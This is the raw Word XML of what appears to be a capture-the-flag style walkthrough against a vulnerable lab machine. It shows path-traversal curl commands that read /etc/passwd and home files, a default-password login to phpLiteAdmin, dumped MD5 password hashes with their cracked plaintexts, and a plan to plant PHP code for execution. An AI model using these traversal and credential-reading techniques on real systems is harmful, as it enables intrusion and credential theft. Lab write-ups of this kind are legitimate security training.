        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the vulnerable file doesn’t even work.  Anyway I</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> don’t thing that’ll help in my </w:t>
      </w:r>
      <w:r w:rsidR="005879DD" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>situation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7802CBC1" w14:textId="77777777" w:rsidR="009F7588" w:rsidRPr="00E71325" w:rsidRDefault="009F7588">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EA65D3" w14:textId="7B365289" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00330878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Looking at the page source saw an interesting page/parameter pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166AE38" w14:textId="77777777" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00330878">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E095AD0" w14:textId="76E96D6B" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00330878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/view.php?page=tools.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74179F39" w14:textId="77777777" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00330878">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B7C720" w14:textId="405EF27D" w:rsidR="00470CAB" w:rsidRPr="00E71325" w:rsidRDefault="00090755" w:rsidP="00470CAB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This may be a possible i</w:t>
      </w:r>
      <w:r w:rsidR="006778EB" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>njection/LFI</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006778EB" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(probably don’t exist anymore)?</w:t>
      </w:r>
      <w:r w:rsidR="00C71A9E" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  Didn’t think something this simple would work, but </w:t>
      </w:r>
      <w:r w:rsidR="00470CAB" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">below seems to give me an LFI </w:t>
      </w:r>
      <w:r w:rsidR="00470CAB" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1589736A" w14:textId="77777777" w:rsidR="00470CAB" w:rsidRPr="00E71325" w:rsidRDefault="00470CAB" w:rsidP="00470CAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7263710D" w14:textId="3567CE32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root@kali:~/Desktop# curl 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/view.php?page=../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4E95F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root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA9BFD9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daemon:x:1:1:daemon:/usr/sbin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6431B5AE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bin:x:2:2:bin:/bin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213C9D9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sys:x:3:3:sys:/dev:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C336A6B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sync:x:4:65534:sync:/bin:/bin/sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B864384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games:x:5:60:games:/usr/games:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D90514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man:x:6:12:man:/var/cache/man:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A4C036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lp:x:7:7:lp:/var/spool/lpd:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E997B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mail:x:8:8:mail:/var/mail:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502D08F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news:x:9:9:news:/var/spool/news:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3807E5BA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uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204DA01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proxy:x:13:13:proxy:/bin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2C0C24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www-data:x:33:33:www-data:/var/www:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA8843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backup:x:34:34:backup:/var/backups:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AA3B3F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list:x:38:38:Mailing List Manager:/var/list:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAFAF9D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irc:x:39:39:ircd:/var/run/ircd:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0D7B4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gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268FDAAD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nobody:x:65534:65534:nobody:/nonexistent:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C4E0DB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libuuid:x:100:101::/var/lib/libuuid:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F332BC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syslog:x:101:103::/home/syslog:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEE35D5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messagebus:x:102:105::/var/run/dbus:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93F68F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ntp:x:103:108::/home/ntp:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A669F0B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sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF053B2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vboxadd:x:999:1::/var/run/vboxadd:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C7A050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statd:x:105:65534::/var/lib/nfs:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405E164C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mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A378D" w14:textId="77777777" w:rsidR="00E65220" w:rsidRPr="00E71325" w:rsidRDefault="00E65220" w:rsidP="00E65220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zico:x:1000:1000:,,,:/home/zico:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDC0CF" w14:textId="77777777" w:rsidR="00F376E6" w:rsidRPr="00E71325" w:rsidRDefault="00F376E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3A7CB8" w14:textId="54ADA418" w:rsidR="00F376E6" w:rsidRPr="00E71325" w:rsidRDefault="00A056DD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So now I have an LFI, </w:t>
      </w:r>
      <w:r w:rsidR="00B50E5D" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00B50E5D" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> interpreter, so all I have to find now is a way to upload some PHP code for execution?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202EC705" w14:textId="77777777" w:rsidR="00F376E6" w:rsidRPr="00E71325" w:rsidRDefault="00F376E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B854DD8" w14:textId="77777777" w:rsidR="00915665" w:rsidRPr="00E71325" w:rsidRDefault="00915665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346D6E04" w14:textId="4C04CCC9" w:rsidR="00915665" w:rsidRPr="00E71325" w:rsidRDefault="00C1157A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Pushing the envelope a little with file permission, found that I can read zico’s home folder</w:t>
      </w:r>
      <w:r w:rsidR="00630904" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, but not too helpful </w:t>
      </w:r>
      <w:r w:rsidR="00630904" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04C"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE2E495" w14:textId="77777777" w:rsidR="00C1157A" w:rsidRPr="00E71325" w:rsidRDefault="00C1157A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0472BF" w14:textId="3AFAC3D2" w:rsidR="00C1157A" w:rsidRPr="00E71325" w:rsidRDefault="00C1157A" w:rsidP="00C1157A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root@kali:~/Desktop# curl 'http://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/view.php?page=../../root/.profile'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D50B40A" w14:textId="6EA38A68" w:rsidR="00C1157A" w:rsidRPr="00E71325" w:rsidRDefault="00C1157A" w:rsidP="00C1157A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root@kali:~/Desktop# curl 'http://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/view.php?page=../../home/zico/.profile'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24978D30" w14:textId="77777777" w:rsidR="00EA4600" w:rsidRPr="00E71325" w:rsidRDefault="00EA4600" w:rsidP="00C1157A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651024E1" w14:textId="72A2C840" w:rsidR="00EA4600" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="00C1157A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Playing a</w:t>
      </w:r>
      <w:r w:rsidR="00EA4600" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>round with the RFI, the current path is /var/www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105AAED4" w14:textId="77777777" w:rsidR="00EA4600" w:rsidRPr="00E71325" w:rsidRDefault="00EA4600" w:rsidP="00C1157A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F1C7E5" w14:textId="4460ABD8" w:rsidR="00EA4600" w:rsidRPr="00E71325" w:rsidRDefault="00EA4600" w:rsidP="00C1157A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root@kali:~/Desktop# curl 'http://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/view.php?page=../../var/www/LICENSE' | html2text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33641298" w14:textId="77777777" w:rsidR="003463D8" w:rsidRPr="00E71325" w:rsidRDefault="003463D8" w:rsidP="00C1157A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5593E967" w14:textId="51A27E66" w:rsidR="003463D8" w:rsidRPr="00E71325" w:rsidRDefault="003463D8" w:rsidP="00C1157A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Found phpLiteAdmin at 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/dbadmin, and able to login with default password of “admin”</w:t>
      </w:r>
      <w:r w:rsidR="00630904" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630904" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B40110" w14:textId="77777777" w:rsidR="00FE6215" w:rsidRPr="00E71325" w:rsidRDefault="00FE6215" w:rsidP="00C1157A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9968A7" w14:textId="7F0309BF" w:rsidR="00FE6215" w:rsidRPr="00E71325" w:rsidRDefault="00FE6215" w:rsidP="00C1157A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PhpLiteAdmin shows that there is a database “test_users” with table “info” at /usr/databases/test_users</w:t>
      </w:r>
      <w:r w:rsidR="007C0527" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.  The table seems to store hash passwords for user root and zico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54814A0F" w14:textId="77777777" w:rsidR="007C0527" w:rsidRPr="00E71325" w:rsidRDefault="007C0527" w:rsidP="00C1157A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A70437" w14:textId="3A97E6A2" w:rsidR="007C0527" w:rsidRPr="00E71325" w:rsidRDefault="007C0527" w:rsidP="007C052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ab/>
        <w:t>edit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>65</w:t>
      </w:r>
      <w:r w:rsidR="001A2A06" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>3F4B285089453FE00E2AAFAC573414</w:t>
      </w:r>
      <w:r w:rsidR="001A2A06" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00390966" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299DE99" w14:textId="5259B1A8" w:rsidR="007C0527" w:rsidRPr="00E71325" w:rsidRDefault="007C0527" w:rsidP="007C052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ab/>
        <w:t>edit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>zico</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>96781A607F4E9F5F423AC01F0DAB0EBD</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A91CC" w14:textId="77777777" w:rsidR="00390966" w:rsidRPr="00E71325" w:rsidRDefault="00390966" w:rsidP="007C0527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F983365" w14:textId="4C4AAAEB" w:rsidR="00390966" w:rsidRPr="00E71325" w:rsidRDefault="00390966" w:rsidP="007C0527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hash-identifier says both hash could be MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF8A64B" w14:textId="77777777" w:rsidR="00390966" w:rsidRPr="00E71325" w:rsidRDefault="00390966" w:rsidP="007C0527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBED032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root@kali:~/Desktop# hash-identifier </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C45D891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  #########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E921AAD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  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> __  __ </w:t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  <w:t xml:space="preserve">    __</w:t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  <w:t xml:space="preserve"> ______    _____</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56163D2E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  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>/\ \/\ \</w:t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  <w:t xml:space="preserve">   /\ \ </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>/\__  _\  /\  _ `\</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3601DA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  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>\ \ \_\ \     __      ____ \ \ \___</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>\/_/\ \/  \ \ \/\ \</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F1D080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  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> \ \  _  \  /'__`\   / ,__\ \ \  _ `\</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   \ \ \   \ \ \ \ \</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD8A335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  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    \_\ \__ \ \ \_\ \</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9E086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  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11275E55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  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A9AB4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  #</w:t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  <w:t xml:space="preserve"> By Zion3R #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EDAB3A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  #</w:t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  <w:t>www.Blackploit.com #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCEC6FC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  #</w:t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</w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       Root@Blackploit.com #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B46F23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  #########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C187764" w14:textId="77777777" w:rsidR="00390966" w:rsidRPr="00E71325" w:rsidRDefault="00390966" w:rsidP="00390966">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A923E7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  -------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D31009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 HASH: 96781A607F4E9F5F423AC01F0DAB0EBD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B0F2C" w14:textId="77777777" w:rsidR="00390966" w:rsidRPr="00E71325" w:rsidRDefault="00390966" w:rsidP="00390966">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4521F17C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Possible Hashs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A0E78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[+]  MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849E510" w14:textId="77777777" w:rsidR="00390966" w:rsidRPr="00E71325" w:rsidRDefault="00390966" w:rsidP="0039096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[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08272814" w14:textId="77777777" w:rsidR="00390966" w:rsidRPr="00E71325" w:rsidRDefault="00390966" w:rsidP="007C0527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDDA5D5" w14:textId="77777777" w:rsidR="001A2A06" w:rsidRPr="00E71325" w:rsidRDefault="001A2A06" w:rsidP="001A2A0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CrackStation (https://crackstation.net) says </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22487499" w14:textId="3193576C" w:rsidR="001A2A06" w:rsidRPr="00E71325" w:rsidRDefault="001A2A06" w:rsidP="001A2A0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Zico:zico2215@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20695C01" w14:textId="30DED804" w:rsidR="001A2A06" w:rsidRPr="00E71325" w:rsidRDefault="001A2A06" w:rsidP="001A2A0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Root:34kroot34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EFD155" w14:textId="548089F2" w:rsidR="00C0781A" w:rsidRPr="00E71325" w:rsidRDefault="00C0781A" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6238E872" w14:textId="1E2B40C8" w:rsidR="00FA7C2C" w:rsidRPr="00E71325" w:rsidRDefault="00FA7C2C" w:rsidP="001A2A0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But none work in SSH </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04C"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6BF973" w14:textId="77777777" w:rsidR="00FA7C2C" w:rsidRPr="00E71325" w:rsidRDefault="00FA7C2C" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50FE2B56" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A0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Anyway, I have phpLiteAdmin, which means I can write data onto the target system using mysql or insert some code into info table in test_users database (/usr/databases/test_users).  This should be enough to get code execution!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F1378" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
